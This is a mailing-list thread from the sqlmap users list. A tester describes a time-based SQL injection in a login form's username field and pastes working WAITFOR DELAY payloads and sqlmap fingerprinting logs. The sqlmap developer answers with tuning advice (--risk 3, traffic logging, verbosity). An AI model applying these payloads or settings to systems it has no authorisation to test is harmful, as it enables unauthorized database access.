Hi Chris,

Against login forms I generally recommend increasing --risk to 3. In
your case the -t traffic.log and -v3 might be of use to debug too.

Bernardo


On 22 January 2012 18:18, Chris Oakley <christopher.oak...@gmail.com> wrote:
> In fact, don't worry about suggestions for manual syntax, t...@test.com'if 1
> = 1 waitfor delay'0:0:20'-- works so I can work with that.  But I wonder why
> sqlmap is struggling?  Chris
>
>
> On 22 January 2012 18:12, Chris Oakley <christopher.oak...@gmail.com> wrote:
>>
>> Hi
>>
>> I've got a web app where the username field of the login form is affected
>> by the following string: t...@test.com'waitfor delay'0:0:10'-- as a
>> username; i.e. the delay happens, the app is vulnerable.  It will always
>> then return you to the login screen with an invalid email error, but we
>> should still be able to exploit the app using time based methods.  Sqlmap
>> picks up on this, but then fails at the fingerprinting stage, i.e:
>>
>> [18:04:03] [INFO] testing MySQL
>> [18:04:03] [WARNING] time-based comparison needs larger statistical model.
>> Making a few dummy requests, please wait..
>> [18:04:16] [CRITICAL] there is considerable lagging in connection
>> response(s). Please use as high value for --time-sec option as p
>> ossible (e.g. 10 or more)
>> [18:04:16] [WARNING] the back-end DBMS is not MySQL
>> [18:04:16] [INFO] testing Oracle
>> [18:04:17] [WARNING] it is very important not to stress the network
>> adapter's bandwidth during usage of time-based queries
>> [18:04:17] [WARNING] the back-end DBMS is not Oracle
>> [18:04:17] [INFO] testing PostgreSQL
>> [18:04:17] [WARNING] the back-end DBMS is not PostgreSQL
>> [18:04:17] [INFO] testing Microsoft SQL Server
>> [18:04:18] [WARNING] the back-end DBMS is not Microsoft SQL Server
>> [18:04:18] [INFO] testing SQLite
>> [18:04:18] [WARNING] the back-end DBMS is not SQLite
>> [18:04:18] [INFO] testing Microsoft Access
>> [18:04:18] [WARNING] the back-end DBMS is not Microsoft Access
>> [18:04:18] [INFO] testing Firebird
>> [18:04:19] [WARNING] the back-end DBMS is not Firebird
>> [18:04:19] [INFO] testing SAP MaxDB
>> [18:04:19] [WARNING] the back-end DBMS is not SAP MaxDB
>> [18:04:19] [INFO] testing Sybase
>> [18:04:19] [WARNING] the back-end DBMS is not Sybase
>> [18:04:19] [INFO] testing IBM DB2
>> [18:04:19] [WARNING] the back-end DBMS is not IBM DB2
>> [18:04:19] [CRITICAL] sqlmap was not able to fingerprint the back-end
>> database management system. Support for this DBMS will be im
>> plemented at some point
>>
>> I'm not sure why this would be the case, it should be able to find that
>> its MS SQL Server.
>>
>> Any ideas why this might be the case?  I can provide more verbose
>> information if required, let me know.
>>
>> In the mean time, any ideas for some more manual injections taking into
>> account the syntax of the injection above?  I'm going to have a manual play
>> now but I thought you might want to know wrt sqlmap.
>>
>> Cheers
>>
>> Chris
>
>
>
> ------------------------------------------------------------------------------
> Try before you buy = See our experts in action!
> The most comprehensive online learning library for Microsoft developers
> is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3,
> Metro Style Apps, more. Free future releases when you subscribe now!
> http://p.sf.net/sfu/learndevnow-dev2
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Bernardo Damele A. G.

Homepage: http://about.me/inquis
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)

------------------------------------------------------------------------------
Try before you buy = See our experts in action!
The most comprehensive online learning library for Microsoft developers
is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3,
Metro Style Apps, more. Free future releases when you subscribe now!
http://p.sf.net/sfu/learndevnow-dev2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to